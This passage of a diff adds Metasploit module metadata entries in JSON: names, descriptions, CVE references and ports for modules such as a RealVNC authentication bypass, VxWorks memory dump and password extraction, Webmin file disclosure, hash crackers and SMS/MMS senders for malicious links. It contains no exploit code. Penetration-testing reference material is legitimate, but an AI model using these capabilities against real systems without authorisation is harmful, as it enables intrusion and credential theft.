] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump secrets from vCenter files" + } + ] + }, + "auxiliary_admin/vnc/realvnc_41_bypass": { + "name": "RealVNC NULL Authentication Mode Bypass", + "fullname": "auxiliary/admin/vnc/realvnc_41_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-05-15", + "type": "auxiliary", + "author": [ + "hdm ", + "theLightCosine " + ], + "description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. 
It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.", + "references": [ + "BID-17978", + "OSVDB-25479", + "URL-https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/", + "CVE-2006-2369" + ], + "platform": "", + "arch": "", + "rport": 5900, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", + "is_install_path": true, + "ref_name": "admin/vnc/realvnc_41_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/apple_airport_extreme_password": { + "name": "Apple Airport Extreme Password Extraction (WDBRPC)", + "fullname": "auxiliary/admin/vxworks/apple_airport_extreme_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. 
Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/apple_airport_extreme_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/dlink_i2eye_autoanswer": { + "name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)", + "fullname": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. 
The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/dlink_i2eye_autoanswer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/wdbrpc_memory_dump": { + "name": "VxWorks WDB Agent Remote Memory Dump", + "fullname": "auxiliary/admin/vxworks/wdbrpc_memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/wdbrpc_memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Dump system memory" + } + ] + }, + "auxiliary_admin/vxworks/wdbrpc_reboot": { + "name": "VxWorks WDB Agent Remote Reboot", + "fullname": 
"auxiliary/admin/vxworks/wdbrpc_reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module provides the ability to reboot a VxWorks target through WDBRPC", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/wdbrpc_reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Reboot", + "description": "Reboot target" + } + ] + }, + "auxiliary_admin/webmin/edit_html_fileaccess": { + "name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access", + "fullname": "auxiliary/admin/webmin/edit_html_fileaccess", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-09-06", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. 
The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.", + "references": [ + "OSVDB-85247", + "BID-55446", + "CVE-2012-2983", + "URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf", + "URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", + "is_install_path": true, + "ref_name": "admin/webmin/edit_html_fileaccess", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/webmin/file_disclosure": { + "name": "Webmin File Disclosure", + "fullname": "auxiliary/admin/webmin/file_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-06-30", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. 
This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).", + "references": [ + "OSVDB-26772", + "BID-18744", + "CVE-2006-3392", + "US-CERT-VU-999601", + "URL-https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", + "is_install_path": true, + "ref_name": "admin/webmin/file_disclosure", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/wemo/crockpot": { + "name": "Belkin Wemo-Enabled Crock-Pot Remote Control", + "fullname": "auxiliary/admin/wemo/crockpot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.", + "references": [ + "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html", + "URL-https://www.belkin.com/us/support-article?articleNum=101177", + "URL-http://www.wemo.com/" + ], + "platform": "", + "arch": "", + "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + 
"targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/wemo/crockpot.rb", + "is_install_path": true, + "ref_name": "admin/wemo/crockpot", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Cook", + "description": "Cook stuff" + }, + { + "name": "Stop", + "description": "Stop cooking" + } + ] + }, + "auxiliary_admin/zend/java_bridge": { + "name": "Zend Server Java Bridge Design Flaw Remote Code Execution", + "fullname": "auxiliary/admin/zend/java_bridge", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-28", + "type": "auxiliary", + "author": [ + "ikki", + "MC " + ], + "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.", + "references": [ + "OSVDB-71420", + "ZDI-11-113", + "EDB-17078" + ], + "platform": "", + "arch": "", + "rport": 10001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/zend/java_bridge.rb", + "is_install_path": true, + "ref_name": "admin/zend/java_bridge", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_analyze/apply_pot": { + "name": "Apply Pot File To Hashes", + "fullname": "auxiliary/analyze/apply_pot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database 
instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/apply_pot.rb", + "is_install_path": true, + "ref_name": "analyze/apply_pot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_aix": { + "name": "Password Cracker: AIX", + "fullname": "auxiliary/analyze/crack_aix", + "aliases": [ + "auxiliary/analyze/jtr_aix" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. 
These utilize DES hashing.\n DES is format 1500 in Hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_aix.rb", + "is_install_path": true, + "ref_name": "analyze/crack_aix", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_databases": { + "name": "Password Cracker: Databases", + "fullname": "auxiliary/analyze/crack_databases", + "aliases": [ + "auxiliary/analyze/jtr_mssql_fast", + "auxiliary/analyze/jtr_mysql_fast", + "auxiliary/analyze/jtr_oracle_fast", + "auxiliary/analyze/jtr_postgres_fast" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n Passwords that have been successfully cracked are then saved as proper credentials.\n Due to the complexity of some of the hash types, they can be very slow. 
Setting the\n ITERATION_TIMEOUT is highly recommended.\n MSSQL is 131, 132, and 1731 in hashcat.\n MYSQL is 200, and 300 in hashcat.\n ORACLE is 112, and 12300 in hashcat.\n POSTGRES is 12 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_databases.rb", + "is_install_path": true, + "ref_name": "analyze/crack_databases", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_linux": { + "name": "Password Cracker: Linux", + "fullname": "auxiliary/analyze/crack_linux", + "aliases": [ + "auxiliary/analyze/jtr_linux" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. 
However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n MD5 is format 500 in hashcat.\n DES is format 1500 in hashcat.\n BSDI is format 12400 in hashcat.\n BLOWFISH is format 3200 in hashcat.\n SHA256 is format 7400 in hashcat.\n SHA512 is format 1800 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_linux.rb", + "is_install_path": true, + "ref_name": "analyze/crack_linux", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_mobile": { + "name": "Password Cracker: Mobile", + "fullname": "auxiliary/analyze/crack_mobile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. 
Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_mobile.rb", + "is_install_path": true, + "ref_name": "analyze/crack_mobile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + } + ] + }, + "auxiliary_analyze/crack_osx": { + "name": "Password Cracker: OSX", + "fullname": "auxiliary/analyze/crack_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. 
The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n XSHA is 122 in hashcat.\n XSHA512 is 1722 in hashcat.\n PBKDF2 (PBKDF2-HMAC-SHA512) is 7100 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_osx.rb", + "is_install_path": true, + "ref_name": "analyze/crack_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_webapps": { + "name": "Password Cracker: Webapps", + "fullname": "auxiliary/analyze/crack_webapps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_webapps.rb", + "is_install_path": true, + "ref_name": "analyze/crack_webapps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + 
"session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_windows": { + "name": "Password Cracker: Windows", + "fullname": "auxiliary/analyze/crack_windows", + "aliases": [ + "auxiliary/analyze/jtr_windows_fast" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n MSCASH is format 1100 in hashcat.\n MSCASH2 is format 2100 in hashcat.\n NetNTLM is format 5500 in hashcat.\n NetNTLMv2 is format 5600 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_windows.rb", + "is_install_path": true, + "ref_name": "analyze/crack_windows", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/modbus_zip": { + "name": "Extract zip from Modbus communication", + "fullname": "auxiliary/analyze/modbus_zip", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "José Diogo Monteiro ", + "Luis Rosa " + ], + "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R.", + "references": [], + "platform": "", + 
"arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/modbus_zip.rb", + "is_install_path": true, + "ref_name": "analyze/modbus_zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_bnat/bnat_router": { + "name": "BNAT Router", + "fullname": "auxiliary/bnat/bnat_router", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "bannedit ", + "Jonathan Claudius" + ], + "description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.", + "references": [ + "URL-https://github.com/claudijd/bnat", + "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 12:09:08 +0000", + "path": "/modules/auxiliary/bnat/bnat_router.rb", + "is_install_path": true, + "ref_name": "bnat/bnat_router", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_bnat/bnat_scan": { + "name": "BNAT Scanner", + "fullname": "auxiliary/bnat/bnat_scan", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "bannedit ", + "Jonathan Claudius " + ], + "description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. 
Typically, these ports will appear in nmap scans as 'filtered'/'closed'.", + "references": [ + "URL-https://github.com/claudijd/bnat", + "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 12:09:08 +0000", + "path": "/modules/auxiliary/bnat/bnat_scan.rb", + "is_install_path": true, + "ref_name": "bnat/bnat_scan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/hwbridge/connect": { + "name": "Hardware Bridge Session Connector", + "fullname": "auxiliary/client/hwbridge/connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Craig Smith" + ], + "description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. 
After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.", + "references": [ + "URL-https://web.archive.org/web/20170206145056/http://opengarages.org/hwbridge/" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/hwbridge/connect.rb", + "is_install_path": true, + "ref_name": "client/hwbridge/connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/iec104/iec104": { + "name": "IEC104 Client Utility", + "fullname": "auxiliary/client/iec104/iec104", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Michael John " + ], + "description": "This module allows sending 104 commands.", + "references": [], + "platform": "", + "arch": "", + "rport": 2404, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/iec104/iec104.rb", + "is_install_path": true, + "ref_name": "client/iec104/iec104", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "SEND_COMMAND", + "description": "Send command to device" + } + ] + }, + "auxiliary_client/mms/send_mms": { + "name": "MMS Client", + "fullname": "auxiliary/client/mms/send_mms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": 
"This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/mms/send_mms.rb", + "is_install_path": true, + "ref_name": "client/mms/send_mms", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/sms/send_text": { + "name": "SMS Client", + "fullname": "auxiliary/client/sms/send_text", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/sms/send_text.rb", + "is_install_path": true, + "ref_name": "client/sms/send_text", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/smtp/emailer": { + "name": "Generic Emailer (SMTP)", + "fullname": "auxiliary/client/smtp/emailer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "et " + ], + 
"description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.", + "references": [ + "URL-http://spl0it.org/" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/smtp/emailer.rb", + "is_install_path": true, + "ref_name": "client/smtp/emailer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/telegram/send_message": { + "name": "Telegram Message Client", + "fullname": "auxiliary/client/telegram/send_message", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ege Balcı ", + "Gaurav Purswani" + ], + "description": "This module can be used to send a document and/or message to\n multiple chats on telegram. 
Please refer to the module\n documentation for info on how to retrieve the bot token and corresponding chat\n ID values.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:04:17 +0000", + "path": "/modules/auxiliary/client/telegram/send_message.rb", + "is_install_path": true, + "ref_name": "client/telegram/send_message", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_ec2": { + "name": "Amazon Web Services EC2 instance enumeration", + "fullname": "auxiliary/cloud/aws/enum_ec2", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto ", + "RageLtMan " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all EC2 instances associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_ec2.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_ec2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_iam": { + "name": "Amazon Web Services IAM credential enumeration", + "fullname": "auxiliary/cloud/aws/enum_iam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM 
